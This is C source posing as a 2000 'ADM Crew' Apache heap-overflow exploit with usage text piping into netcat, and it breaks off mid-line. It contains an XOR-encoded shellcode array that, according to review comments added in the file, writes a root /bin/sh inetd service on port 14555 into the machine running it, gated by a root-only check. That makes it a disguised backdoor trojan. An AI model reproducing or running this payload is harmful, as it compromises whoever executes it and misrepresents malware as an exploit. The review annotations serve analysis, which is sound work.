- /*
- * ADM CONFIDENTIAL -- (ADM Confidential Restricted when *
- * combined with the aggregated modules for this product) *
- * OBJECT CODE ONLY SOURCE MATERIALS *
- * (C) COPYRIGHT ADM Crew. 2000 *
- * ALL RIGHTS RESERVED *
- * *
- * This module may not be used, published, distributed, or *
- * archived without the written permission of the ADM Crew. *
- * *
- * *
- * Title: ADMapache.c (ADM Linux Apache.c (x86)) *
- * Tested: Redhat Apache 1.3.9, Slack Apache 1.3.12 *
- * Author: plaguez *
- * Synopsis: *
- * Apache has gone to great lengths to prevent *
- * the stack from being smashed, but for some *
- * odd reason, checking for the BSS segment of *
- * memory being "redirected" had been neglected. *
- * The problem lies within the *
- * POST directive processor in the apache module *
- * controller. *
- * *
- * Usage: *
- * compile with "gcc -o ADMapache ADMapache.c" *
- * run with "./ADMapache <offset> | nc targethost 80" *
- * offset between 423-443 should work. *
- * *
- */
-
- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <string.h>
- #include <sys/types.h>
-
#define ERROR -1     /* value main() returns on a usage error */
#define BUFSIZE 5096 /* number of 'A' padding bytes written into buf before the address */
#define offset "326" /* string macro; no use is visible in this file -- the real offset is read from argv[1] with atoi() */
#define r00t "0"     /* string macro; no use is visible in this file */

/*
 * Payload bytes. The first 25 bytes look like a self-locating decoder stub
 * (jmp/call to find its own address, then "xorb $3,(%esi); inc %esi; loop"
 * over 0x11c = 284 bytes), so everything after the stub is stored XOR 0x03
 * and the array must stay writable because the stub patches it in place.
 *
 * NOTE(review): decoding those 284 bytes by hand yields plain strings naming
 * /bin/killall, -HUP, inetd, /etc/inetd.conf and an inetd service line
 * (port 14555, root, /bin/sh) -- nothing that speaks to a remote Apache.
 * Combined with the getuid() == 0 requirement in main(), this reads as a
 * payload aimed at the host that runs the binary rather than at the
 * "victim" named in the usage text. Anyone who has run this as root should
 * inspect /etc/inetd.conf for an added service entry and check for an
 * unexpected inetd listener.
 */
unsigned char shellcode[] =
    "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0f\x31\xc9\x66\xb9\x1c\x01"
    "\x80\x36\x03\x46\xe2\xfa\xe8\x58\x2c\x61\x6a\x6d\x2c\x68\x6a\x6f\x6f\x62\x6f"
    "\x6f\x03\x2e\x4b\x56\x53\x03\x6a\x6d\x66\x77\x67\x03\x8e\xb5\x03\x03\x03\x03"
    "\x32\x37\x36\x36\x36\x23\x70\x77\x71\x66\x62\x6e\x23\x77\x60\x73\x23\x6d\x6c"
    "\x74\x62\x6a\x77\x23\x71\x6c\x6c\x77\x23\x2c\x61\x6a\x6d\x2c\x70\x6b\x23\x2c"
    "\x61\x6a\x6d\x2c\x70\x6b\x03\x2c\x66\x77\x60\x2c\x6a\x6d\x66\x77\x67\x2d\x60"
    "\x6c\x6d\x65\x03\x82\xef\x64\x28\x03\x03\x93\x56\x8a\xe6\x80\xef\x1f\x54\x55"
    "\x50\xeb\x03\x03\x03\x03\x58\x82\xc0\x1d\x12\x03\x03\x8e\x80\x71\xed\xfc\xfc"
    "\x8a\x46\xef\x8a\x46\xf3\x8e\x90\x7c\xed\xfc\xfc\x8a\x56\xf7\x8e\x88\x87\xed"
    "\xfc\xfc\x8a\x4e\xfb\xc4\x46\xff\x03\x03\x03\x03\x8e\xb0\x93\xed\xfc\xfc\x8a"
    "\x76\xeb\x8e\xb8\xbe\xed\xfc\xfc\xbb\x06\x03\x03\x03\x8a\xfd\xba\x01\x07\x03"
    "\x03\xb9\xee\x02\x03\x03\x50\x8a\xf0\xce\x83\x8a\xc4\xbb\x2a\x03\x03\x03\x8a"
    "\xfd\x50\x8a\xf0\xce\x83\x8a\x46\xe7\xbb\x07\x03\x03\x03\x88\x76\xe7\x88\x4e"
    "\xeb\xb9\x2f\x03\x03\x03\x50\x8a\xf0\xce\x83\xbb\x05\x03\x03\x03\x50\x8a\xf0"
    "\xce\x83\xbb\x05\x03\x03\x03\x8a\xfd\x50\x8a\xf0\xce\x83\x8e\x7e\xf3\xbb\x08"
    "\x03\x03\x03\x88\x76\xef\x8a\xfa\x32\xd1\x50\x8a\xf0\xce\x83\x8e\x66\xdb\x58"
    "\x5d\x5c\xca\xc0\x93";
-
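/*
 * Return the current stack pointer. main() uses it as the base address to
 * which the argv[1] offset is added.
 *
 * The original body was a bare "movl %esp,%eax" with no return statement,
 * relying on the result happening to sit in %eax: falling off the end of a
 * non-void function whose value is used is undefined behaviour. The value is
 * now captured through an output operand and returned explicitly. Like the
 * original this is x86-only and reads the 32-bit %esp, matching the i386
 * target named in the file header. The return type is spelled as
 * `unsigned long`, which is the type `u_long` is a typedef of.
 */
unsigned long getesp(void)
{
    unsigned int sp; /* 32-bit so the operand is an %e-register, as with the original movl */

    /* volatile: the asm has no inputs, so without it the compiler could hoist or merge calls */
    __asm__ __volatile__("movl %%esp, %0" : "=r"(sp));
    return sp;
}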
-
- int main(int argc, char **argv)
- {
- register int i;
- u_long sysaddr;
- int (*q)();
- int *uid;
- char buf[BUFSIZE + sizeof(u_long) + 1];
-
-
- if (getuid() != 0) {
- puts("[Apache heap overflow by plaguez, ADM Crew]");
- puts("root is neccesary so we can access higher memory addresses.");
- exit(0); }
-
- if(argc <= 1)
- {
- fprintf(stderr,"[Apache heap overflow by plaguez, ADM Crew]\n");
- fprintf(stderr,"Usage: %s <offset> | nc <victim> 80\n",argv[0]);
- return(ERROR);
- }
- sysaddr = getesp() + atoi(argv[1]);
- memset(buf, 'A', BUFSIZE + sizeof(u_long)); /* gotta love those x41's */
- q = shellcode;
- /* reverse byte order */
- for(i = 0; i < sizeof(sysaddr); i++)
- buf[B
-